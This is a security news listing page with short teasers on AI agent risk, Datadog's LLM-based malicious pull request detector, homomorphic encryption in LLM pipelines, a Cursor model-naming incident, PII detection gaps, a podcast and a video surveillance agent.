Security | Threat Detection | Cyberattacks | DevSecOps | Compliance

The Shift to Continuous Context and the Rise of Guardian Agents

AI agent risk doesn’t emerge in a single moment. It develops over time across configuration changes, runtime behavior, long-horizon tasks, and interactions between agents, users, and enterprise systems. Their behavior and exposure can shift in real time as agents rewrite instructions, update memory, and dynamically alter execution.

BewAIre: Detecting Malicious Pull Requests at Scale with LLMs

As AI coding assistants accelerate software development, the volume of pull requests at Datadog has grown to nearly 10,000 per week, increasing the risk that malicious changes slip through due to review fatigue. To address this, Datadog built BewAIre, an LLM-powered code review system designed to identify malicious source code changes introduced by threat actors. By reducing approval fatigue for developers while increasing friction for attackers, BewAIre guides human reviewers to the areas where judgment matters most, without slowing developer velocity.

Homomorphic Encryption in LLM Pipelines: Why It Fails in 2026

There’s a claim gaining traction in the market: homomorphic encryption can preserve data privacy in AI workflows. Encrypt your data, run it through a language model, and never expose a single token. Sounds bulletproof. It isn’t. Homomorphic encryption (HE) was built for math, not language. Applying it to LLM pipelines is like encrypting a book and asking someone to summarize it without reading a word. The problem isn’t efficiency.

Moonshot AI governance breakdown: Lessons from the Cursor/Kimi K2.5 incident

What happens when a $29 billion company forgets to rename a model ID, and what it means for every organization using open-source AI. On March 19, 2025, Cursor, the AI-powered coding tool valued at $29 billion and generating an estimated $2 billion in annual recurring revenue, launched Composer 2, its newest and most powerful coding model.

Why NER models fail at PII detection in LLM workflows - 7 critical gaps

In AI systems, PII detection is the first step. Not the most glamorous step. But the one that, when it fails, takes everything else down with it. Identifying sensitive data (names, Social Security numbers, financial records, health information) has to happen before any of it reaches an LLM. Get this wrong, and you’re looking at one of two bad outcomes: Traditional DLP systems could afford to be aggressive with detection. LLMs can’t. They depend on full context to generate correct outputs.

Has AI structurally changed the cyber industry forever? #cybersecurity #podcast #ai

On this week's episode of The Cybersecurity Defenders Podcast, Stel Valavanis, founder of onShore Networks, argues that AI is a significant milestone but does not change where security is headed. He puts AI alongside the Internet and TCP/IP and makes the case that the path forward is clear: fully embrace it as a tool, regardless of which side of the equation you are on. He also points out that agentic and automated AI was already being deployed well before LLMs arrived.

Meet Eeva, the new video agent in the Brivo Eagle Eye VMS

The world of video surveillance is moving beyond simple recording and moving toward true intelligence. To get an inside look at our latest breakthrough in AI video surveillance technology, we sat down with Kyle Perkuhn, Sr. Product Marketing Manager at Brivo, to discuss Eeva. Unlike traditional systems which can only spot a person or a car, Eeva allows you to use natural language to define exactly what matters to your business.